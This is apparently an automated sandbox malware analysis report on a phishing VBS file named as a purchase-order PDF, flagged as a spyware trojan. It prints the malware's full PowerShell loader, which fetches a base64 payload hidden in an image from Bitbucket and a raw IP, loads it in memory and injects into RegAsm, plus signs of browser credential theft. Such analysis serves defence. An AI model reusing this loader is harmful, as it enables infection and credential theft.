        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0479E7EC8_2_0479E7EC
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0479E3388_2_0479E338
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0479D8B88_2_0479D8B8
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0479E9718_2_0479E971
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 10_2_04E7C7CE10_2_04E7C7CE
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 10_2_04E92F1E10_2_04E92F1E
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 10_2_04E7404E10_2_04E7404E
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 10_2_04E7A9CE10_2_04E7A9CE
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 10_2_04E7912E10_2_04E7912E
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 10_2_04E722EE10_2_04E722EE
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 10_2_04E7426E10_2_04E7426E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 03235130 appears 36 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0326EA12 appears 84 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 03247E54 appears 88 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 031EB970 appears 266 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0327F290 appears 105 times
        Source: C:\Windows\SysWOW64\where.exeCode function: String function: 049C7E54 appears 89 times
        Source: C:\Windows\SysWOW64\where.exeCode function: String function: 049FF290 appears 105 times
        Source: C:\Windows\SysWOW64\where.exeCode function: String function: 049B5130 appears 36 times
        Source: C:\Windows\SysWOW64\where.exeCode function: String function: 0496B970 appears 266 times
        Source: C:\Windows\SysWOW64\where.exeCode function: String function: 049EEA12 appears 84 times
        Source: PO-DC13112024_pdf.vbsInitial sample: Strings found which are bigger than 50
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4396
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4396Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 3292, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winVBS@12/8@11/7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qflcgbek.rhl.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: where.exe, 00000008.00000003.2670845670.0000000002915000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000003.2670976784.0000000002936000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3403339543.0000000002963000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3403339543.0000000002936000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000003.2673241150.0000000002940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: PO-DC13112024_pdf.vbsVirustotal: Detection: 9%
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$ZgBn$Gs$ZgBn$Gg$Zg$v$HM$ZwBz$GQ$ZwBo$HM$Z$Bm$HM$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DE$Mw$0$DE$NQ$n$Cw$I$$n$Gg$d$B0$H$$Og$v$C8$MQ$w$DM$Lg$y$D$$Lg$x$D$$Mg$u$DY$Mg$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeProcess created: C:\Windows\SysWOW64\where.exe "C:\Windows\SysWOW64\where.exe"
        Source: C:\Windows\SysWOW64\where.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$ZgBn$Gs$ZgBn$Gg$Zg$v$HM$ZwBz$GQ$ZwBo$HM$Z$Bm$HM$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DE$Mw$0$DE$NQ$n$Cw$I$$n$Gg$d$B0$H$$Og$v$C8$MQ$w$DM$Lg$y$D$$Lg$x$D$$Mg$u$DY$Mg$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$GJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeProcess created: C:\Windows\SysWOW64\where.exe "C:\Windows\SysWOW64\where.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\where.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
